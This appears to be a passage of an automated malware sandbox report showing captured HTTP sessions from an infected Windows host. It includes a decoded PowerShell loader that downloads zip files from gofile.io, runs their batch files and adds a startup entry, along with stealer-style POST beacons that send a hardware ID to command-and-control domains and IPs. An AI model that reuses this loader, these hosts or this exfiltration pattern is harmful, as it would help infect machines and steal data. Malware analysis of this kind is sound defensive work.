                                                                                    Data Ascii: 5LI+z3Mh6KzqVdLRyv6HD5WZmgDRIB4xly0h0RgGegL1pGNYI6f0pT8QgURfqJNbFh+JwQfqyqIE6SHFR4YgEjf2/Qtq5vipO5XGlJft00mNzM4QwfcKsYf+tdNHiPfSJ/L/jbLy7v6u15FBjmiHHREcGhWB8oqh1ywlgVdMc1P+aWZbpCW67zcQhoceb9iEjcwI0NLhFT+aqGKDVkx30iJ26MtxqGs4ql+RV9h9ARsIz0mSkCEe41qoZUAXiyO


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.1049757107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:53 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:56:53 UTC1267OUTData Raw: 6b 78 64 75 34 57 2f 7a 56 6c 33 76 41 70 64 42 6a 42 72 46 58 79 73 56 77 7a 48 2b 39 59 36 57 46 59 54 4b 48 72 4f 35 66 38 55 70 51 70 51 41 43 6e 43 64 6e 65 36 33 68 55 6d 37 49 37 6e 58 65 42 7a 4d 6a 42 56 37 6e 53 63 68 2b 51 34 4f 35 6d 6b 55 45 50 39 32 2f 2f 61 38 69 66 53 31 7a 53 68 75 74 37 4b 38 4d 69 4e 39 36 68 4c 58 72 35 49 50 45 6d 44 46 45 68 79 33 77 38 6f 6d 71 5a 78 79 39 30 62 57 33 45 6b 39 51 59 56 6c 31 2f 36 63 34 61 63 4a 6a 67 50 61 38 6e 46 38 53 2b 7a 6c 4c 4d 74 68 50 55 69 6a 5a 34 4a 51 52 57 68 52 6f 4b 6c 68 6e 52 79 39 76 45 57 77 31 4a 77 47 77 45 47 6e 59 57 68 2f 50 43 4d 77 53 61 53 49 35 4a 4c 59 70 68 6e 4e 57 46 34 74 6a 53 61 4f 6c 2f 45 6f 64 70 74 64 31 4e 41 48 6d 6a 4e 72 4c 30 54 64 74 66 75 32 4b 4b 4d
                                                                                    Data Ascii: kxdu4W/zVl3vApdBjBrFXysVwzH+9Y6WFYTKHrO5f8UpQpQACnCdne63hUm7I7nXeBzMjBV7nSch+Q4O5mkUEP92//a8ifS1zShut7K8MiN96hLXr5IPEmDFEhy3w8omqZxy90bW3Ek9QYVl1/6c4acJjgPa8nF8S+zlLMthPUijZ4JQRWhRoKlhnRy9vEWw1JwGwEGnYWh/PCMwSaSI5JLYphnNWF4tjSaOl/Eodptd1NAHmjNrL0Tdtfu2KKM
                                                                                    2024-07-24 17:56:54 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:54 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:56:54 UTC685INData Raw: 67 50 4f 6a 4e 50 49 6f 58 6d 33 62 4f 4e 2f 4f 72 2b 49 47 72 73 6b 6e 4d 4f 4e 30 46 62 5a 59 4c 53 54 67 62 46 34 61 68 79 56 4d 69 4b 65 4e 75 55 4a 74 58 36 62 65 6f 43 4f 4c 37 4b 38 5a 56 6c 69 49 5a 6a 75 54 6e 64 77 5a 6b 67 4d 76 68 42 5a 45 33 6e 78 46 30 6d 2f 5a 6f 55 54 6f 4a 50 69 50 67 6c 49 62 6e 34 73 69 32 78 33 30 4a 30 6a 51 4c 74 69 2f 42 6c 53 4a 58 69 30 56 56 43 4c 4b 58 56 73 39 6b 35 48 77 72 5a 34 43 72 34 71 2b 71 64 74 4b 78 58 44 69 6d 4c 79 33 67 37 61 43 47 55 5a 65 44 6b 54 6d 43 76 4a 7a 32 50 47 71 44 58 48 49 4a 34 68 65 35 2f 42 51 38 31 7a 77 76 32 63 49 41 63 44 56 4e 58 6a 73 59 49 4f 69 4b 7a 65 6f 39 4f 5a 41 4f 69 67 7a 51 31 46 4b 6b 79 44 75 51 76 2f 2b 6e 69 66 31 35 2f 4f 50 73 4b 52 33 69 4e 66 33 48 6a 59
                                                                                    Data Ascii: gPOjNPIoXm3bON/Or+IGrsknMON0FbZYLSTgbF4ahyVMiKeNuUJtX6beoCOL7K8ZVliIZjuTndwZkgMvhBZE3nxF0m/ZoUToJPiPglIbn4si2x30J0jQLti/BlSJXi0VVCLKXVs9k5HwrZ4Cr4q+qdtKxXDimLy3g7aCGUZeDkTmCvJz2PGqDXHIJ4he5/BQ81zwv2cIAcDVNXjsYIOiKzeo9OZAOigzQ1FKkyDuQv/+nif15/OPsKR3iNf3HjY


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.1049759104.26.3.164434688C:\Users\user\AppData\Local\Temp\753F.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:53 UTC167OUTGET /microgods/raw HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: rentry.co
                                                                                    Connection: Keep-Alive
                                                                                    2024-07-24 17:56:53 UTC694INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:56:53 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 2509
                                                                                    Connection: close
                                                                                    vary: Origin
                                                                                    x-xss-protection: 1; mode=block
                                                                                    x-content-type-options: nosniff
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains
                                                                                    Cache-Control: Vary
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ezeHwzl32uPxBUZ6unmlnyznLjUvmUYvEzCtrvtu8PCKnIFBzRc1pAxhu8BRpCcwLlOUpCcW5vjeSOW8m6zjOjr4r7iFcSyEyFhRE9EeMKKoUf%2BNXL19utpLxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85ca19fc167c94-EWR
                                                                                    2024-07-24 17:56:53 UTC675INData Raw: 24 75 72 6c 31 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 36 62 32 34 65 63 39 37 2d 32 61 38 64 2d 34 36 38 64 2d 61 32 34 64 2d 63 38 30 38 31 63 64 61 31 64 61 62 2f 76 6d 2e 7a 69 70 22 0d 0a 24 75 72 6c 32 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 30 36 35 36 63 35 63 66 2d 35 31 62 34 2d 34 66 61 34 2d 61 65 34 38 2d 38 65 65 35 65 64 33 64 31 34 32 65 2f 6c 6d 2e 7a 69 70 22 0d 0a 24 74 65 6d 70 44 69 72 31 20 3d 20 5b 53 79 73 74 65 6d 2e 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 20 22 45 78 74 72 61 63 74 65 64 56 65 6e 6f
                                                                                    Data Ascii: $url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVeno
                                                                                    2024-07-24 17:56:53 UTC1369INData Raw: 72 79 0d 0a 20 20 20 20 29 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 73 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 64 69 72 65 63 74 6f 72 79 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 0d 0a 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 62 61 74 46 69 6c 65 20 69 6e 20 24 62 61 74 46 69 6c 65 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 22 63 6d 64 2e 65 78 65 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2f 63 20 24 28 24 62 61 74 46 69 6c 65 2e 46 75 6c 6c 4e 61 6d 65 29 22 20 2d 57 6f 72 6b 69 6e 67 44 69 72 65 63 74 6f 72 79 20 24 64 69 72 65 63 74 6f 72 79 20 2d 4e 6f 4e 65 77 57 69 6e 64 6f 77 0d 0a 20 20 20 20 7d 0d 0a 7d 0d 0a 0d 0a
                                                                                    Data Ascii: ry ) $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File foreach ($batFile in $batFiles) { Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow }}
                                                                                    2024-07-24 17:56:53 UTC465INData Raw: 69 72 32 2e 43 6f 75 6e 74 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 31 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 32 0d 0a 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 31 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 74 65 6d 70 44 69 72 31 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 46 69 72 73 74 20 31 0d 0a 20 20 20 20 69 66 20 28 24 62 61 74 46 69 6c 65 31 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 56 62 73 54 6f 53 74 61 72 74 75 70 20 2d 62 61 74 46 69 6c 65 50 61 74 68 20 24 62 61
                                                                                    Data Ascii: ir2.Count -gt 0) { Run-BatFiles -directory $tempDir1 Run-BatFiles -directory $tempDir2 $batFile1 = Get-ChildItem -Path $tempDir1 -Filter *.bat -File | Select-Object -First 1 if ($batFile1) { Add-VbsToStartup -batFilePath $ba


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.1049760188.114.96.34434216C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:54 UTC286OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 12842
                                                                                    Host: callosallsaospz.shop
                                                                                    2024-07-24 17:56:54 UTC12842OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                                    2024-07-24 17:56:54 UTC808INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:56:54 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=4s6330b9tj30jr2eutm88k8hv1; expires=Sun, 17-Nov-2024 11:43:33 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HOzQ9o44k4GverMCDPoC%2B39C5AcjcLhBZQwAz3mWa8k3jmAbe0e61v9fbQQckJ7ZiI1jzfy9XHOClTwzt%2FQflrRvzl9Tk6fPzaZTmh%2BmYKvLG6bc1544Y7t5WZYpTIEHnuXNmdb31Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85ca1f5d5a8ccc-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:56:54 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                                    Data Ascii: eok 8.46.123.33
                                                                                    2024-07-24 17:56:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.1049761167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:55 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:56:55 UTC1122OUTData Raw: 4a 68 54 6f 49 50 58 54 72 64 31 57 44 44 51 68 4d 47 6c 56 44 77 45 53 72 33 32 62 7a 6c 58 78 78 4a 66 58 45 59 38 74 76 66 48 41 6f 57 4f 56 64 30 6b 72 6a 47 39 38 35 65 35 56 45 30 48 65 68 47 51 67 48 73 57 6c 77 68 7a 49 45 47 45 78 67 62 48 69 53 72 6e 49 4b 48 6f 32 62 70 4d 61 59 6d 2f 70 44 54 57 6f 59 52 35 7a 75 65 4a 33 70 59 53 6a 58 36 74 42 46 61 65 42 75 54 6c 51 70 58 75 66 39 35 55 30 72 43 45 72 61 34 4e 4e 4b 6f 58 34 69 37 46 49 4e 57 4b 6f 65 79 77 4f 63 73 74 50 58 45 77 52 6a 7a 2b 52 51 48 38 78 4c 4c 32 58 31 6b 39 39 45 38 6f 58 63 34 68 4d 6b 79 75 58 48 7a 79 75 55 63 77 74 55 78 56 64 73 46 6c 73 54 62 79 2f 77 6e 52 59 59 55 6d 2f 41 57 47 73 54 30 51 4b 71 6c 69 5a 41 32 58 79 61 33 7a 61 4b 61 4e 5a 69 4c 38 41 7a 6e 36
                                                                                    Data Ascii: JhToIPXTrd1WDDQhMGlVDwESr32bzlXxxJfXEY8tvfHAoWOVd0krjG985e5VE0HehGQgHsWlwhzIEGExgbHiSrnIKHo2bpMaYm/pDTWoYR5zueJ3pYSjX6tBFaeBuTlQpXuf95U0rCEra4NNKoX4i7FINWKoeywOcstPXEwRjz+RQH8xLL2X1k99E8oXc4hMkyuXHzyuUcwtUxVdsFlsTby/wnRYYUm/AWGsT0QKqliZA2Xya3zaKaNZiL8Azn6
                                                                                    2024-07-24 17:56:56 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:55 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:56:56 UTC685INData Raw: 44 30 7a 64 70 47 6b 79 59 47 68 58 58 61 33 62 4e 34 73 58 4f 4c 37 56 31 44 64 4e 68 58 55 37 48 76 4a 64 68 57 4c 2b 52 2f 45 72 35 4f 6a 32 5a 6d 48 77 72 33 4c 42 77 37 34 68 34 63 36 49 73 55 32 76 72 7a 74 48 68 55 32 7a 30 4f 76 43 59 6f 73 69 69 49 69 32 4d 47 4a 2f 76 66 4b 4d 4c 64 61 4f 4b 51 57 69 71 78 49 37 35 4f 46 4d 56 62 47 6a 32 42 34 6f 62 69 67 61 6c 69 6a 2b 67 36 61 56 4c 78 73 6f 4e 4f 56 56 4b 62 61 54 74 49 66 4d 59 42 72 77 31 66 34 61 68 63 64 4c 58 43 58 52 52 61 76 2b 30 51 6d 72 52 30 63 39 6f 6b 76 72 69 47 72 6d 2f 42 52 34 4b 36 6e 36 59 53 6b 53 55 71 70 30 57 31 36 6a 56 2f 6d 6e 6e 73 34 61 57 4c 30 73 41 4a 53 47 67 4f 72 6a 39 46 49 61 76 64 72 59 34 68 32 6f 50 56 77 75 76 4f 79 51 53 68 69 63 46 7a 6a 75 75 63 53
                                                                                    Data Ascii: D0zdpGkyYGhXXa3bN4sXOL7V1DdNhXU7HvJdhWL+R/Er5Oj2ZmHwr3LBw74h4c6IsU2vrztHhU2z0OvCYosiiIi2MGJ/vfKMLdaOKQWiqxI75OFMVbGj2B4obigalij+g6aVLxsoNOVVKbaTtIfMYBrw1f4ahcdLXCXRRav+0QmrR0c9okvriGrm/BR4K6n6YSkSUqp0W16jV/mnns4aWL0sAJSGgOrj9FIavdrY4h2oPVwuvOyQShicFzjuucS


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.1049762188.114.96.34434216C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:56 UTC286OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 15069
                                                                                    Host: callosallsaospz.shop
                                                                                    2024-07-24 17:56:56 UTC15069OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                                    2024-07-24 17:56:56 UTC814INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:56:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=jr95vl9qiug8ldccb7op3uif6k; expires=Sun, 17-Nov-2024 11:43:35 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fcdu42JmNEKI1UG%2F7wU5sYYKLy8YC2%2BCJBUm7dwSd%2FHhhGLxX35auveV26FAeSlGHMYxKmqzWeXsIDKX7f3LRQorDj0j0Nw9wXmqSQZNwgvi%2BUyMlUfsv5eLTuL23wr2xAK%2FHDFN9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85ca2b3c2a4207-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:56:56 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                                    Data Ascii: eok 8.46.123.33
                                                                                    2024-07-24 17:56:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.1049764107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:56 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:56:56 UTC1267OUTData Raw: 68 4b 53 77 2b 6d 5a 72 59 65 37 45 75 61 45 78 45 42 4f 49 76 45 44 6e 54 59 68 39 4e 42 7a 6b 4b 73 71 6b 31 7a 5a 6f 65 52 58 32 78 39 36 56 74 59 46 46 6f 2f 6d 48 55 44 78 46 57 7a 67 67 30 49 50 61 41 4f 73 4a 33 69 36 63 45 6f 34 49 37 34 39 42 38 30 5a 74 6b 7a 56 77 37 79 61 72 59 64 70 65 61 64 68 59 34 73 6c 6e 4a 65 43 72 2b 53 52 4d 67 6e 79 6e 69 73 4f 66 76 31 37 4c 47 46 4d 63 57 53 53 42 37 6e 48 4c 30 58 33 74 69 63 67 31 61 75 6b 45 45 48 51 79 64 32 33 68 68 55 2f 34 56 31 57 36 51 50 79 62 39 30 7a 46 6d 32 54 6f 6d 54 79 79 79 66 75 52 4e 4d 30 70 58 72 79 71 6c 49 69 62 39 6e 50 54 59 7a 61 6d 75 4d 39 6b 4f 4a 66 72 34 34 50 65 67 42 64 4c 4a 2f 6a 4d 37 59 70 35 7a 6a 61 39 53 34 57 58 79 47 45 6f 7a 70 74 63 7a 30 37 72 48 6b 5a
                                                                                    Data Ascii: hKSw+mZrYe7EuaExEBOIvEDnTYh9NBzkKsqk1zZoeRX2x96VtYFFo/mHUDxFWzgg0IPaAOsJ3i6cEo4I749B80ZtkzVw7yarYdpeadhY4slnJeCr+SRMgnynisOfv17LGFMcWSSB7nHL0X3ticg1aukEEHQyd23hhU/4V1W6QPyb90zFm2TomTyyyfuRNM0pXryqlIib9nPTYzamuM9kOJfr44PegBdLJ/jM7Yp5zja9S4WXyGEozptcz07rHkZ
                                                                                    2024-07-24 17:56:58 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:57 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:56:58 UTC685INData Raw: 4e 6d 46 45 57 78 41 62 70 76 75 5a 53 4b 79 33 50 78 78 4d 44 74 43 6f 69 76 53 37 47 64 33 36 6d 69 78 37 63 54 36 48 69 55 70 79 66 6a 72 37 67 57 45 43 70 6b 66 68 4c 54 2f 4f 75 32 4a 6a 4b 50 56 45 7a 46 71 4c 50 67 79 50 37 5a 35 4f 58 34 36 4e 39 30 34 6a 52 65 68 76 50 6e 66 32 38 32 7a 73 41 70 51 30 63 62 31 2b 71 61 59 75 6a 72 46 61 38 66 64 2f 35 61 2b 65 63 72 77 37 31 6a 53 50 33 74 43 31 71 52 64 76 52 66 63 34 44 70 6a 55 42 48 31 71 48 73 61 68 57 31 55 51 59 2f 4a 44 65 44 72 44 65 4a 39 63 72 44 5a 39 4d 6d 66 77 66 68 49 4f 4c 74 78 50 43 33 6c 48 63 62 4f 69 67 4f 2b 55 76 6c 62 37 68 31 57 39 67 6c 66 72 75 62 6f 6b 71 2f 66 65 4a 44 52 67 57 75 78 6e 4e 71 41 57 63 38 6f 77 74 51 2f 70 46 35 65 57 34 4c 55 37 51 64 66 34 31 4a 6d
                                                                                    Data Ascii: NmFEWxAbpvuZSKy3PxxMDtCoivS7Gd36mix7cT6HiUpyfjr7gWECpkfhLT/Ou2JjKPVEzFqLPgyP7Z5OX46N904jRehvPnf282zsApQ0cb1+qaYujrFa8fd/5a+ecrw71jSP3tC1qRdvRfc4DpjUBH1qHsahW1UQY/JDeDrDeJ9crDZ9MmfwfhIOLtxPC3lHcbOigO+Uvlb7h1W9glfrubokq/feJDRgWuxnNqAWc8owtQ/pF5eW4LU7Qdf41Jm


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.104976331.14.70.2454436872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:56 UTC220OUTGET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: store4.gofile.io
                                                                                    Connection: Keep-Alive
                                                                                    2024-07-24 17:56:57 UTC577INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.27.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:57 GMT
                                                                                    Content-Type: application/zip
                                                                                    Content-Length: 296998
                                                                                    Connection: close
                                                                                    Accept-Ranges: bytes
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                    Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                    Content-Disposition: attachment; filename*=UTF-8''vm.zip
                                                                                    Last-Modified: Sat, 20 Jul 2024 15:35:59 GMT
                                                                                    2024-07-24 17:56:57 UTC512INData Raw: 50 4b 03 04 14 00 00 00 08 00 dd 74 ee 58 cf a1 af e2 8a 9e 01 00 ff 9f 01 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1e 2c e1 d3 60 9c e8 00 00 00 00 5a b9 e0 9f 01 00 b0 01 30 84 0a 17 00 00 00 02 84 0a 17 00 00 00 e2 f0 81 c7 c8 60 d4 c8 e0 38 d3 0d 6b a8 40 7e 43 42 42 78 45 44 b8 8e c4 f4 26 64 49 c2 fa 90 bd c3 8e 2c 04 65 ca 0c c3 44 33 63 e6 cd 00 1b 15 f2 75 2e 36 08 0d 0d 0d 0d 09 fb e8 2c e7 02 e7 51 1d a5 d6 20 04 61 48 5d 3f 41 9f fb e3 78 8c 57 37 d8 63 1c 04 3b ac 66 fe 55 cd 04 c3 1d cc a6 43 93 5a 4b 8b 57 0a ee dd 76 c6 f0 c4 6f 0b a9 0d b8 52 ab f3 f7 de 75 2d 32 fd d6 ea f7 c9 c6 8c af bf 8a 23 db f4 53 5f 0a f2 0a ef 6d 13 d4 b1 3f 0c f6 df 34 16 d5 4b e0 f1 1b 76 cd 49 6c 55 65 c4 f8 b1 01 f5 86 86 ce fc 44 83 fe 80 f7 d7 52 e7 bf 20
                                                                                    Data Ascii: PKtXdata.bin,`Z0`8k@~CBBxED&dI,eD3cu.6,Q aH]?AxW7c;fUCZKWvoRu-2#S_m?4KvIlUeDR
